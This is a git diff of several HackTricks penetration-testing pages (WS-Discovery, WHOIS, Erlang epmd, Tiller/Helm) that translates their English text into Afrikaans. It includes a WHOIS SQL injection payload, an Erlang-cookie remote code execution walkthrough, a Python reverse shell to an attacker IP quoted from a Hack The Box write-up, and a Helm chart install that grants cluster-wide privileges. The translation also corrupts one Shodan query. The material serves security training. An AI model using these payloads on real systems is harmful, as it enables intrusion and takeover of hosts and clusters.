-# Basic Information +# Basiese Inligting -The **Web Services Dynamic Discovery Protocol (WS-Discovery)** is identified as a protocol designed for the discovery of services within a local network through multicast. It facilitates the interaction between **Target Services** and **Clients**. Target Services are endpoints available for discovery, while Clients are the ones actively searching for these services. Communication is established using **SOAP queries over UDP**, directed to the multicast address **239.255.255.250** and UDP port **3702**. +Die **Web Services Dynamic Discovery Protocol (WS-Discovery)** word geïdentifiseer as 'n protokol wat ontwerp is vir die ontdekking van dienste binne 'n plaaslike netwerk deur middel van multicast. Dit fasiliteer die interaksie tussen **Target Services** en **Clients**. Target Services is eindpunte wat beskikbaar is vir ontdekking, terwyl Clients aktief soek na hierdie dienste. Kommunikasie word tot stand gebring deur **SOAP-navrae oor UDP**, gerig aan die multicast-adres **239.255.255.250** en UDP-poort **3702**. -Upon joining a network, a Target Service announces its presence by broadcasting a **multicast Hello**. It remains open to receiving **multicast Probes** from Clients that are on the lookout for services by Type, an identifier unique to the endpoint (e.g., **NetworkVideoTransmitter** for an IP camera). In response to a matching Probe, a Target Service may send a **unicast Probe Match**. Similarly, a Target Service could receive a **multicast Resolve** aimed at identifying a service by name, to which it may reply with a **unicast Resolve Match** if it is the intended target. In the event of leaving the network, a Target Service attempts to broadcast a **multicast Bye**, signaling its departure. +By die aansluiting by 'n netwerk, kondig 'n Target Service sy teenwoordigheid aan deur 'n **multicast Hello** uit te saai. Dit bly oop vir die ontvangs van **multicast Probes** van Clients wat op soek is na dienste volgens Tipe, 'n unieke identifiseerder vir die eindpunt (bv. **NetworkVideoTransmitter** vir 'n IP-kamera). In reaksie op 'n ooreenstemmende Probe kan 'n Target Service 'n **unicast Probe Match** stuur. Op dieselfde manier kan 'n Target Service 'n **multicast Resolve** ontvang wat daarop gemik is om 'n diens volgens naam te identifiseer, waarop dit kan antwoord met 'n **unicast Resolve Match** as dit die bedoelde teiken is. In die geval van die verlaat van die netwerk, probeer 'n Target Service 'n **multicast Bye** uitsaai om sy vertrek aan te dui. ![](<../.gitbook/assets/image (633).png>) -**Default port**: 3702 - +**Verstekpoort**: 3702 ``` PORT STATE SERVICE 3702/udp open|filtered unknown @@ -34,20 +31,16 @@ PORT STATE SERVICE | Address: http://10.0.200.116:50000 |_ Type: Device wprt:PrintDeviceType ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/network-services-pentesting/43-pentesting-whois.md b/network-services-pentesting/43-pentesting-whois.md index 5eff2164e..daedd8523 100644 --- a/network-services-pentesting/43-pentesting-whois.md +++ b/network-services-pentesting/43-pentesting-whois.md @@ -1,85 +1,74 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Basic Information +# Basiese Inligting -The **WHOIS** protocol serves as a standard method for **inquiring about the registrants or holders of various Internet resources** through specific databases. These resources encompass domain names, blocks of IP addresses, and autonomous systems, among others. Beyond these, the protocol finds application in accessing a broader spectrum of information. - -**Default port:** 43 +Die **WHOIS**-protokol dien as 'n standaardmetode om **navraag te doen oor die registrante of houers van verskillende internetbronne** deur spesifieke databasisse. Hierdie bronne sluit domeinname, blokke van IP-adresse en outonome stelsels in, onder andere. Buiten hierdie bronne vind die protokol toepassing in die toegang tot 'n breër spektrum van inligting. +**Verstekpoort:** 43 ``` PORT STATE SERVICE 43/tcp open whois? ``` +# Enumereer -# Enumerate - -Get all the information that a whois service has about a domain: - +Kry alle inligting wat 'n whois-diens oor 'n domein het: ```bash whois -h -p "domain.tld" echo "domain.ltd" | nc -vn ``` - -Notice than sometimes when requesting for some information to a WHOIS service the database being used appears in the response: +Let daarop dat wanneer jy vir inligting vra by 'n WHOIS-diens, die gebruikte databasis in die antwoord verskyn: ![](<../.gitbook/assets/image (147).png>) -Also, the WHOIS service always needs to use a **database** to store and extract the information. So, a possible **SQLInjection** could be present when **querying** the database from some information provided by the user. For example doing: `whois -h 10.10.10.155 -p 43 "a') or 1=1#"` you could be able to **extract all** the **information** saved in the database. +Die WHOIS-diens moet altyd 'n **databasis** gebruik om die inligting te stoor en te onttrek. Daarom kan 'n moontlike **SQLInjection** teenwoordig wees wanneer jy die databasis ondervra deur inligting wat deur die gebruiker verskaf word. Byvoorbeeld deur die volgende te doen: `whois -h 10.10.10.155 -p 43 "a') or 1=1#"` kan jy in staat wees om **alle** die **inligting** wat in die databasis gestoor is, te **onttrek**. # Shodan * `port:43 whois` -# HackTricks Automatic Commands - +# HackTricks Outomatiese Opdragte ``` Protocol_Name: WHOIS #Protocol Abbreviation if there is one. Port_Number: 43 #Comma separated if there is more than one. Protocol_Description: WHOIS #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for WHOIS - Note: | - The WHOIS protocol serves as a standard method for inquiring about the registrants or holders of various Internet resources through specific databases. These resources encompass domain names, blocks of IP addresses, and autonomous systems, among others. Beyond these, the protocol finds application in accessing a broader spectrum of information. +Name: Notes +Description: Notes for WHOIS +Note: | +The WHOIS protocol serves as a standard method for inquiring about the registrants or holders of various Internet resources through specific databases. These resources encompass domain names, blocks of IP addresses, and autonomous systems, among others. Beyond these, the protocol finds application in accessing a broader spectrum of information. - https://book.hacktricks.xyz/pentesting/pentesting-smtp +https://book.hacktricks.xyz/pentesting/pentesting-smtp Entry_2: - Name: Banner Grab - Description: Grab WHOIS Banner - Command: whois -h {IP} -p 43 {Domain_Name} && echo {Domain_Name} | nc -vn {IP} 43 +Name: Banner Grab +Description: Grab WHOIS Banner +Command: whois -h {IP} -p 43 {Domain_Name} && echo {Domain_Name} | nc -vn {IP} 43 ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md b/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md index da8861ac1..0758428cd 100644 --- a/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md +++ b/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md @@ -1,37 +1,32 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Basic Info +# Basiese Inligting -The **Erlang Port Mapper Daemon (epmd)** serves as a coordinator for distributed Erlang instances. It is responsible for mapping symbolic node names to machine addresses, essentially ensuring that each node name is associated with a specific address. This role of **epmd** is crucial for the seamless interaction and communication between different Erlang nodes across a network. - -**Default port**: 4369 +Die **Erlang Port Mapper Daemon (epmd)** dien as 'n koördineerder vir verspreide Erlang-instansies. Dit is verantwoordelik vir die kartering van simboliese nodenaam na masjienadresse, en verseker dus dat elke nodenaam geassosieer word met 'n spesifieke adres. Hierdie rol van **epmd** is noodsaaklik vir die naadlose interaksie en kommunikasie tussen verskillende Erlang-nodes oor 'n netwerk. +**Verstekpoort**: 4369 ``` PORT STATE SERVICE VERSION 4369/tcp open epmd Erlang Port Mapper Daemon ``` +Hierdie word standaard gebruik op RabbitMQ en CouchDB installasies. -This is used by default on RabbitMQ and CouchDB installations. - -# Enumeration - -## Manual +# Opname +## Handleiding ```bash echo -n -e "\x00\x01\x6e" | nc -vn 4369 @@ -41,30 +36,26 @@ apt-get install erlang erl #Once Erlang is installed this will promp an erlang terminal 1> net_adm:names(''). #This will return the listen addresses ``` - -## Automatic - +## Outomaties ```bash nmap -sV -Pn -n -T4 -p 4369 --script epmd-info PORT STATE SERVICE VERSION 4369/tcp open epmd Erlang Port Mapper Daemon -| epmd-info: +| epmd-info: | epmd_port: 4369 -| nodes: +| nodes: | bigcouch: 11502 | freeswitch: 8031 | ecallmgr: 11501 | kazoo_apps: 11500 |_ kazoo-rabbitmq: 25672 ``` +# Erlang Koekie RCE -# Erlang Cookie RCE - -## Remote Connection - -If you can **leak the Authentication cookie** you will be able to execute code on the host. Usually, this cookie is located in `~/.erlang.cookie` and is generated by erlang at the first start. If not modified or set manually it is a random string \[A:Z] with a length of 20 characters. +## Verre Verbinding +As jy die **Verifikasiekoekie kan uitlek**, sal jy in staat wees om kode op die gasheer uit te voer. Gewoonlik is hierdie koekie in `~/.erlang.cookie` geleë en word dit deur Erlang gegenereer by die eerste begin. As dit nie gewysig of handmatig ingestel word nie, is dit 'n lukrake string \[A:Z] met 'n lengte van 20 karakters. ```bash greif@baldr ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10] @@ -76,50 +67,43 @@ At last, we can start an erlang shell on the remote system. (test@target.fqdn)1>os:cmd("id"). "uid=0(root) gid=0(root) groups=0(root)\n" ``` - -More information in [https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/)\ -The author also share a program to brutforce the cookie: +Meer inligting in [https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/)\ +Die skrywer deel ook 'n program om die koekie te kragtig te kraak: {% file src="../.gitbook/assets/epmd_bf-0.1.tar.bz2" %} -## Local Connection - -In this case we are going to abuse CouchDB to escalate privileges locally: +## Plaaslike Verbinding +In hierdie geval gaan ons CouchDB misbruik om plaaslike voorregte te verhoog: ```bash -HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE +HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE (anonymous@canape)1> rpc:call('couchdb@localhost', os, cmd, [whoami]). "homer\n" (anonymous@canape)4> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]). ``` - -Example taken from [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)\ -You can use **Canape HTB machine to** **practice** how to **exploit this vuln**. +Voorbeeld geneem van [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)\ +Jy kan die **Canape HTB-masjien gebruik** om te **oefen** hoe om hierdie kwesbaarheid te **uitbuit**. ## Metasploit - ```bash #Metasploit can also exploit this if you know the cookie msf5> use exploit/multi/misc/erlang_cookie_rce ``` - # Shodan -* `port:4369 "at port"` +* `poort:4369 "by poort"`
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- - diff --git a/network-services-pentesting/44134-pentesting-tiller-helm.md b/network-services-pentesting/44134-pentesting-tiller-helm.md index 794741bc3..02e2240b5 100644 --- a/network-services-pentesting/44134-pentesting-tiller-helm.md +++ b/network-services-pentesting/44134-pentesting-tiller-helm.md @@ -1,35 +1,30 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-# Basic Information +# Basiese Inligting -Helm is the **package manager** for Kubernetes. It allows to package YAML files and distribute them in public and private repositories. These packages are called **Helm Charts**. **Tiller** is the **service** **running** by default in the port 44134 offering the service. - -**Default port:** 44134 +Helm is die **pakketbestuurder** vir Kubernetes. Dit maak dit moontlik om YAML-lêers te verpak en hulle in openbare en private repositoriums te versprei. Hierdie pakkette word **Helm Charts** genoem. **Tiller** is die **diens** wat standaard op die poort 44134 loop en die diens aanbied. +**Standaardpoort:** 44134 ``` PORT STATE SERVICE VERSION 44134/tcp open unknown ``` +# Enumerasie -# Enumeration - -If you can **enumerate pods and/or services** of different namespaces enumerate them and search for the ones with **"tiller" in their name**: - +As jy pods en/of dienste van verskillende namespaces kan **enumereer**, enumereer hulle en soek na diegene met **"tiller" in hul naam**: ```bash kubectl get pods | grep -i "tiller" kubectl get services | grep -i "tiller" @@ -38,9 +33,7 @@ kubectl get services -n kube-system | grep -i "tiller" kubectl get pods -n | grep -i "tiller" kubectl get services -n | grep -i "tiller" ``` - -Examples: - +Voorbeelde: ```bash kubectl get pods -n kube-system NAME READY STATUS RESTARTS AGE @@ -52,48 +45,39 @@ NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) kube-dns ClusterIP 10.96.0.10 53/UDP,53/TCP,9153/TCP 35m tiller-deploy ClusterIP 10.98.57.159 44134/TCP 35m ``` - -You could also try to find this service running checking the port 44134: - +Jy kan ook probeer om hierdie diens te vind deur die poort 44134 te kontroleer: ```bash sudo nmap -sS -p 44134 ``` +Sodra jy dit ontdek het, kan jy daarmee kommunikeer deur die klient helm-toepassing af te laai. Jy kan gereedskap soos `homebrew` gebruik, of kyk na [**die amptelike vrystellingsbladsy**](https://github.com/helm/helm/releases)**.** Vir meer besonderhede, of vir ander opsies, sien [die installasiegids](https://v2.helm.sh/docs/using\_helm/#installing-helm). -Once you have discovered it you can communicate with it downloading the client helm application. You can use tools like `homebrew`, or look at [**the official releases page**](https://github.com/helm/helm/releases)**.** For more details, or for other options, see [the installation guide](https://v2.helm.sh/docs/using\_helm/#installing-helm). - -Then, you can **enumerate the service**: - +Dan kan jy **die diens opnoem**: ``` helm --host tiller-deploy.kube-system:44134 version ``` +## Voorregverhoging -## Privilege Escalation - -By default **Helm2** was installed in the **namespace kube-system** with **high privileges**, so if you find the service and has access to it, this could allow you to **escalate privileges**. - -All you need to do is to install a package like this one: [**https://github.com/Ruil1n/helm-tiller-pwn**](https://github.com/Ruil1n/helm-tiller-pwn) that will give the **default service token access to everything in the whole cluster.** +Standaard is **Helm2** geïnstalleer in die **namespace kube-system** met **hoë voorregte**, so as jy die diens vind en toegang daartoe het, kan dit jou in staat stel om **voorregte te verhoog**. +Al wat jy hoef te doen is om 'n pakkie soos hierdie een te installeer: [**https://github.com/Ruil1n/helm-tiller-pwn**](https://github.com/Ruil1n/helm-tiller-pwn) wat die **standaard diens-token toegang gee tot alles in die hele groep.** ``` git clone https://github.com/Ruil1n/helm-tiller-pwn helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn /pwnchart ``` - -In [http://rui0.cn/archives/1573](http://rui0.cn/archives/1573) you have the **explanation of the attack**, but basically, if you read the files [**clusterrole.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrole.yaml) and [**clusterrolebinding.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrolebinding.yaml) inside _helm-tiller-pwn/pwnchart/templates/_ you can see how **all the privileges are being given to the default token**. +In [http://rui0.cn/archives/1573](http://rui0.cn/archives/1573) het jy die **verduideliking van die aanval**, maar basies, as jy die lêers [**clusterrole.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrole.yaml) en [**clusterrolebinding.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrolebinding.yaml) binne _helm-tiller-pwn/pwnchart/templates/_ lees, kan jy sien hoe **alle voorregte aan die verstek-token gegee word**.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
- - diff --git a/network-services-pentesting/44818-ethernetip.md b/network-services-pentesting/44818-ethernetip.md index 171de8f91..c55f36c8a 100644 --- a/network-services-pentesting/44818-ethernetip.md +++ b/network-services-pentesting/44818-ethernetip.md @@ -1,56 +1,82 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
